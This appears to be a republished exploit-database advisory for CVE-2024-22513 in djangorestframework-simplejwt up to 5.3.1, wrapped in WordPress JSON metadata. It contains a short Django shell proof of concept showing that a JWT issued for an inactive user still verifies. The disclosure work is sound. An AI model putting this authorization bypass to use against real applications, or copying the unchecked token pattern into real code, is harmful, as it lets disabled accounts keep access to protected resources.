# Exploit Title: djangorestframework-simplejwt 5.3.1 – Information Disclosure
# Date: 26\/01\/2024
# Exploit Author: Dhrumil Mistry (dmdhrumilmistry)
# Vendor Homepage: https:\/\/github.com\/jazzband\/djangorestframework-simplejwt\/
# Software Link:https:\/\/github.com\/jazzband\/djangorestframework-simplejwt\/releases\/tag\/v5.3.1
# Version: <= 5.3.1
# Tested on: MacOS
# CVE : CVE-2024-22513<\/p>\n
# The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable.
# This vulnerability has the potential to cause various security issues,
# including Business Object Level Authorization (BOLA), Business Function
# Level Authorization (BFLA), Information Disclosure, etc. The vulnerability
# arises from the fact that a user can access web application resources even
# after their account has been disabled, primarily due to the absence of proper
# user validation checks.<\/p>\n
# If a programmer generates a JWT token for an inactive user using
`AccessToken`
# class and `for_user` method then a JWT token is returned which can
be used for
# authentication across the django and django rest framework application.<\/p>\n
# Start Django Shell using below command:
# python manage.py shell
# —————————————-<\/p>\n
# Create inactive user and generate token for the user
from django.contrib.auth.models import User
from rest_framework_simplejwt.tokens import AccessToken<\/p>\n
# create inactive user
inactive_user_id = User.objects.create_user(‘testuser’,
‘test@example.com’, ‘testPassw0rd!’, is_active=False).id<\/p>\n
# django application programmer generates token for the inactive user
AccessToken.for_user(User.objects.get(id=inactive_user_id)) # error
should be raised since user is inactive<\/p>\n
# django application verifying user token
AccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() #
no exception is raised during verification of inactive user token<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: djangorestframework-simplejwt 5.3.1 – Information Disclosure# Date: 26\/01\/2024# Exploit Author: Dhrumil Mistry (dmdhrumilmistry)# Vendor Homepage: https:\/\/github.com\/jazzband\/djangorestframework-simplejwt\/# Software Link:https:\/\/github.com\/jazzband\/djangorestframework-simplejwt\/releases\/tag\/v5.3.1# Version: <= 5.3.1# Tested on: MacOS# CVE : CVE-2024-22513 # The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable.# This vulnerability has the potential to cause various security issues,# including Business Object Level Authorization (BOLA), …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56275","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56275","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56275"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56275\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56275"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56275"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56275"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}